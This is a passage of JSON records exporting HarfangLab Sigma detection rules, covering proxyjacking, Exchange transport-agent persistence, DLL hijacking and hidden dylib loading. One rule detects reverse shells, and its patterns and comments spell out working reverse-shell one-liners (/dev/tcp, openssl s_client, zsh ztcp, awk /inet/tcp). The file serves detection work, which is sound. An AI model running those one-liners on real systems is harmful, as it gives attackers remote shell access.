+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.613613Z",
+ "creation_date": "2026-03-23T11:45:34.613616Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.613624Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
+ "https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
+ "https://attack.mitre.org/techniques/T1496/"
+ ],
+ "name": "t1496_earnfm.yml",
+ "content": "title: EarnFM Executed\nid: 039f1d5b-74b0-46d1-8a0e-dfa8bea707bd\ndescription: |\n Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.EarnFm\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' EARNFM_TOKEN='\n\n condition: selection\nlevel: high\nconfidence: strong",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd",
+ "rule_name": "EarnFM Executed",
+ "rule_description": "Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
+ "rule_creation_date": "2024-09-26",
+ "rule_modified_date": "2025-02-12",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.impact"
+ ],
+ "rule_technique_tags": [
+ "attack.t1496"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "03a594fd-50c7-4041-9c5c-706a4009f30a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "medium",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.072500Z",
+ "creation_date": "2026-03-23T11:45:34.072502Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.072506Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
+ "https://attack.mitre.org/techniques/T1505/002/"
+ ],
+ "name": "t1505_002_new_exchange_transport_agent_powershell.yml",
+ "content": "title: New Exchange TransportAgent Installed via PowerShell\nid: 03a594fd-50c7-4041-9c5c-706a4009f30a\ndescription: |\n Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Install-TransportAgent '\n\n selection_assemblypath:\n PowershellCommand|contains:\n - ' -A ' # -AssemblyPath\n - ' -As ' # -AssemblyPath\n - ' -Ass ' # -AssemblyPath\n - ' -Asse ' # -AssemblyPath\n - ' -Assem ' # -AssemblyPath\n - ' -Assemb ' # -AssemblyPath\n - ' -Assembl ' # -AssemblyPath\n - ' -Assembly ' # -AssemblyPath\n - ' -AssemblyP ' # -AssemblyPath\n - ' -AssemblyPa ' # -AssemblyPath\n - ' -AssemblyPat ' # -AssemblyPath\n - ' -AssemblyPath ' # -AssemblyPath\n\n selection_transportagent:\n PowershellCommand|contains:\n - ' -T ' # -TransportAgentFactory\n - ' -Tr ' # -TransportAgentFactory\n - ' -Tra ' # -TransportAgentFactory\n - ' -Tran ' # -TransportAgentFactory\n - ' -Trans ' # -TransportAgentFactory\n - ' -Transp ' # -TransportAgentFactory\n - ' -Transpo ' # -TransportAgentFactory\n - ' -Transpor ' # -TransportAgentFactory\n - ' -Transport ' # -TransportAgentFactory\n - ' -TransportA ' # -TransportAgentFactory\n - ' -TransportAg ' # -TransportAgentFactory\n - ' -TransportAge ' # -TransportAgentFactory\n - ' -TransportAgen ' # -TransportAgentFactory\n - ' -TransportAgent ' # -TransportAgentFactory\n - ' -TransportAgentF ' # -TransportAgentFactory\n - ' -TransportAgentFa ' # -TransportAgentFactory\n - ' -TransportAgentFac ' # -TransportAgentFactory\n - ' -TransportAgentFact ' # -TransportAgentFactory\n - ' -TransportAgentFacto ' # -TransportAgentFactory\n - ' -TransportAgentFactor ' # -TransportAgentFactory\n - ' -TransportAgentFactory ' # -TransportAgentFactory\n\n exclusion_fsecure:\n PowershellCommand|contains: 'Install-TransportAgent -Name $AGENT -AssemblyPath $AGINSTDIR\\fstragnt.dll'\n\n exclusion_kaspersky:\n PowershellCommand|contains|all:\n - 'Kaspersky Security '\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Microsoft Exchange Servers\\Kse.ExchangeIntegration.Transport.dll'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Smex\\instSetupHelper.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "03a594fd-50c7-4041-9c5c-706a4009f30a",
+ "rule_name": "New Exchange TransportAgent Installed via PowerShell",
+ "rule_description": "Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\n",
+ "rule_creation_date": "2022-11-08",
+ "rule_modified_date": "2025-05-26",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.collection",
+ "attack.command_and_control",
+ "attack.defense_evasion",
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1071.003",
+ "attack.t1104",
+ "attack.t1114.002",
+ "attack.t1505.002",
+ "attack.t1546.008"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "03d8eca6-3f1e-4d11-b989-2c6762458061",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.587248Z",
+ "creation_date": "2026-03-23T11:45:34.587252Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.587259Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://github.com/xforcered/WFH",
+ "https://twitter.com/an0n_r0/status/1544472352657915904",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_diskpart.yml",
+ "content": "title: DLL Hijacking via diskpart.exe\nid: 03d8eca6-3f1e-4d11-b989-2c6762458061\ndescription: |\n Detects potential Windows DLL Hijacking via diskpart.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'diskpart.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "03d8eca6-3f1e-4d11-b989-2c6762458061",
+ "rule_name": "DLL Hijacking via diskpart.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via diskpart.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.092994Z",
+ "creation_date": "2026-03-23T11:45:34.092996Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.093000Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1564/001/"
+ ],
+ "name": "t1564_001_hidden_dylib_loaded.yml",
+ "content": "title: Hidden Dylib File Loaded\nid: 03dfe441-3d70-41a1-8a9b-9e3c68cee99b\ndescription: |\n Detects a hidden dylib library being loaded.\n Adversaries can create hidden malicious libraries to avoid raising users' suspicions.\n It is recommended to check the origin of the library to determine its legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/06/03\nmodified: 2025/11/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.LibraryLoaded\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n category: library_event\n product: macos\ndetection:\n selection:\n ImageLoaded|re: '.*\\/\\.[^\\/]*$'\n\n exclusion_grr:\n ImageLoaded:\n - '/private/var/db/oah/*/*/.Python.aot'\n - '/usr/local/lib/grr/grr_*/.Python'\n Image: '/usr/local/lib/grr/grr_*/grr'\n\n exclusion_postman:\n Image: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_var_folder:\n ImageLoaded|startswith:\n - '/private/var/folders/??/'\n - '/private/var/db/???/'\n\n exclusion_claude:\n Image|contains:\n - '/claude/versions/'\n - '/claude-code/'\n - '/extensions/anthropic.claude-code-'\n - '/Users/*/.claude/'\n ImageLoaded: '/private/tmp/.????????????????-????????.node'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "03dfe441-3d70-41a1-8a9b-9e3c68cee99b",
+ "rule_name": "Hidden Dylib File Loaded",
+ "rule_description": "Detects a hidden dylib library being loaded.\nAdversaries can create hidden malicious libraries to avoid raising users' suspicions.\nIt is recommended to check the origin of the library to determine its legitimacy.\n",
+ "rule_creation_date": "2024-06-03",
+ "rule_modified_date": "2025-11-19",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1564.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.591378Z",
+ "creation_date": "2026-03-23T11:45:34.591382Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.591389Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/xforcered/WFH",
+ "https://securityintelligence.com/posts/windows-features-dll-sideloading/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_dsget.yml",
+ "content": "title: DLL Hijacking via dsget.exe\nid: 03fc1f68-4d9c-420b-b4a5-79fae4a133ee\ndescription: |\n Detects potential Windows DLL Hijacking via dsget.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsget.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "03fc1f68-4d9c-420b-b4a5-79fae4a133ee",
+ "rule_name": "DLL Hijacking via dsget.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via dsget.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2022-09-15",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "04429fe5-8be4-4481-b930-acfc3c648434",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.075966Z",
+ "creation_date": "2026-03-23T11:45:34.075968Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.075973Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_gpupdate.yml",
+ "content": "title: DLL Hijacking via gpupdate.exe\nid: 04429fe5-8be4-4481-b930-acfc3c648434\ndescription: |\n Detects potential Windows DLL Hijacking via gpupdate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'gpupdate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "04429fe5-8be4-4481-b930-acfc3c648434",
+ "rule_name": "DLL Hijacking via gpupdate.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via gpupdate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0462a933-4c70-4baa-b836-58671ae8a94b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.095664Z",
+ "creation_date": "2026-03-23T11:45:34.095666Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.095670Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
+ "https://www.revshells.com/",
+ "https://attack.mitre.org/techniques/T1059/004/",
+ "https://attack.mitre.org/techniques/T1559/"
+ ],
+ "name": "t1059_004_reverse_shell_command_line_macos.yml",
+ "content": "title: Reverse Shell Executed from Command-line\nid: 0462a933-4c70-4baa-b836-58671ae8a94b\ndescription: |\n Detects suspicious shell commands related to the execution of reverse shells.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2024/05/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n - 'sh*>*/dev/tcp/'\n - 'sh*>*/dev/udp/'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/udp/127.0.0.1/'\n\n condition: selection_command or (all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0462a933-4c70-4baa-b836-58671ae8a94b",
+ "rule_name": "Reverse Shell Executed from Command-line",
+ "rule_description": "Detects suspicious shell commands related to the execution of reverse shells.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate the process that started the reverse shell, as well as any malcious actions the reverse could have taken.\n",
+ "rule_creation_date": "2024-05-15",
+ "rule_modified_date": "2025-04-14",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.execution"
+ ],
+ "rule_technique_tags": [
+ "attack.t1059.004",
+ "attack.t1559"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0486b170-5b3c-4234-8610-a8881dfb1dbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
